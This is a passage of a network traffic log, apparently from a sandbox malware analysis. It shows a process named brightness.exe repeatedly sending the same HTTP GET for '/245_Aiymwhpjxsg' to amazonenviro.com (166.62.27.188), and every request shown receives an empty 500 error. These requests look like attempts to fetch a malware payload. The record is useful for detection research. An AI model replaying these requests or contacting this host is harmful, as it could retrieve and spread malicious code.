Jan 10, 2025 09:00:06.095654964 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:05 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50003	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:06.225713015 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:07.151499987 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:06 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50012	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:07.278532028 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:08.226175070 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:08 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50022	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:08.356169939 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:09.292172909 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:09 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50030	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:09.419085979 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:10.347740889 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:10 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50040	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:10.475697994 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:11.411885023 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:11 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50048	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:11.540348053 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:12.471609116 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:12 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50057	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:12.616924047 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:13.547369957 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:13 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50067	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:13.677695990 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:14.621083975 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:14 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50074	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:14.748699903 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:15.668155909 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:15 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50084	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:15.795185089 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:16.716309071 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:16 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50093	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:16.843628883 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:17.776226044 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:17 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50101	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:17.908320904 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:18.830769062 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:18 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50108	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:18.966984987 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:19.910593033 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:19 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50116	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:20.043621063 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:20.966774940 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:20 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50122	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:21.133877993 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:22.050848961 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:21 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50124	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:22.187096119 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:23.134906054 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:22 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50126	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:23.276742935 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:24.223851919 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:24 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50128	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:24.359713078 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:25.264719963 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:25 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50130	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:25.447155952 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:26.358365059 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:26 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50133	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:26.492497921 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:27.422723055 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:27 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50135	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:27.609075069 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:28.527998924 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:28 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50137	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:28.664470911 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:29.615518093 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:29 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50139	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:29.742562056 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:30.650271893 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:30 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50141	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:30.776796103 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:31.708340883 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:31 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50143	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:31.846013069 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:32.800143003 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:32 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50145	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:32.937071085 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:33.891694069 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:33 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50147	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:34.067647934 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:34.989392996 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:34 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50149	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:35.124136925 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:36.047362089 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:35 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50151	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:36.183043957 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:37.089878082 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:36 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50153	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:37.217168093 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:38.136305094 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:37 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50155	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:38.272300959 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:39.222901106 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:39 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50157	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:39.359817028 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:40.278882980 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:40 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50159	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:40.414895058 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:41.347810984 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:41 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50161	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:41.495275974 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:42.407859087 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:42 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50163	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:42.544972897 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:43.472117901 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:43 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50165	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:43.609070063 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:44.560300112 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:44 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50167	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:44.697309017 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:45.646708012 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:45 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50169	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:45.840106010 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:46.772366047 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:46 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50171	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:46.936789036 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
